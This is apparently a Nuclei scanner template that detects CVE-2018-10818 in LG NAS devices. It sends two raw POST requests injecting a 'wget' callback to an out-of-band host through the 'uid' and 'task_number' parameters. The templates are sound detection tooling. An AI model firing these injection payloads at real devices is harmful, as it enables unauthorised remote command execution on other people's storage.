44 lines
1.2 KiB
YAML
44 lines
1.2 KiB
YAML
id: CVE-2018-10818
|
|
|
|
info:
|
|
name: LG NAS Devices - Remote Code Execution
|
|
author: gy741
|
|
severity: critical
|
|
description: LG NAS devices contain a pre-auth remote command injection via the "password" parameter.
|
|
reference:
|
|
- https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
|
|
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10818
|
|
classification:
|
|
cve-id: CVE-2018-10818
|
|
tags: cve,cve2018,lg-nas,rce,oast,injection
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /system/sharedir.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
&uid=10; wget http://{{interactsh-url}}
|
|
|
|
- |
|
|
POST /en/php/usb_sync.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
&act=sync&task_number=1;wget http://{{interactsh-url}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/04/26
|